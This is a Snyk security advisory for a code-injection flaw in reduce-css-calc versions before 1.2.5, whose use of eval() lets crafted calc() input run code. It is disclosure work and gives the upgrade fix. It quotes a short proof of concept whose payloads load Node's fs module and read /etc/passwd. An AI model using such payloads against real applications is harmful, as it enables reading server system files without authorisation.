Arbitrary Code Injection Affecting reduce-css-calc package, versions <1.2.5


0.0
medium

Snyk CVSS

    Attack Complexity Low
    User Interaction Required
    Scope Changed
Expand this section
NVD
6.1 medium

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:reduce-css-calc:20160913
  • published 17 Oct 2016
  • disclosed 20 Aug 2016
  • credit Сковорода Никита Андреевич (ChALkeR)

How to fix?

Upgrade reduce-css-calc version 1.2.5 or greater.

Overview

reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));